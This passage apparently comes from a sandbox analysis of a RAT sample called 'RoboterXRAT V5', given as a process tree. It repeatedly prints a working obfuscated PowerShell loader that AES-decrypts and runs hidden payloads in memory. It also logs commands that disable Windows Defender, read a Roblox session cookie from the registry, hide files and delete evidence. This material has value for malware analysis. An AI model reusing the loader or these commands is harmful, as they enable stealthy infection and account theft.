$nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:5072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        26⤵
        
        PID:4120
        
        C:\Windows\system32\net.exe
        
        net file
        27⤵
        
        PID:6744
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        28⤵
        
        PID:6208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:828
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        25⤵
        
        PID:3228
        
        C:\Windows\system32\net.exe
        
        net file
        26⤵
        
        PID:6520
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        27⤵
        
        PID:7092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:5984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        24⤵
        
        PID:4484
        
        C:\Windows\system32\net.exe
        
        net file
        25⤵
        
        PID:6184
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        26⤵
        
        PID:6244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:3232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        23⤵
        
        PID:4220
        
        C:\Windows\system32\net.exe
        
        net file
        24⤵
        
        PID:7072
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        25⤵
        
        PID:7080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:5240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        22⤵
        
        PID:3548
        
        C:\Windows\system32\net.exe
        
        net file
        23⤵
        
        PID:4700
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        24⤵
        
        PID:4988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:336
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:1260
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:6528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:6900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        21⤵
        
        PID:6172
        
        C:\Windows\system32\net.exe
        
        net file
        22⤵
        
        PID:6732
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        23⤵
        
        PID:7076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:5224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:4428
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        Views/modifies file attributes
        
        PID:6992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:1212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:5632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:5168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:6728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6252
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:1912
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5996
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        20⤵
        
        PID:6916
        
        C:\Windows\system32\net.exe
        
        net file
        21⤵
        
        PID:6872
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        22⤵
        
        PID:6620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:6640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        19⤵
        
        PID:7128
        
        C:\Windows\system32\net.exe
        
        net file
        20⤵
        
        PID:2824
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        21⤵
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
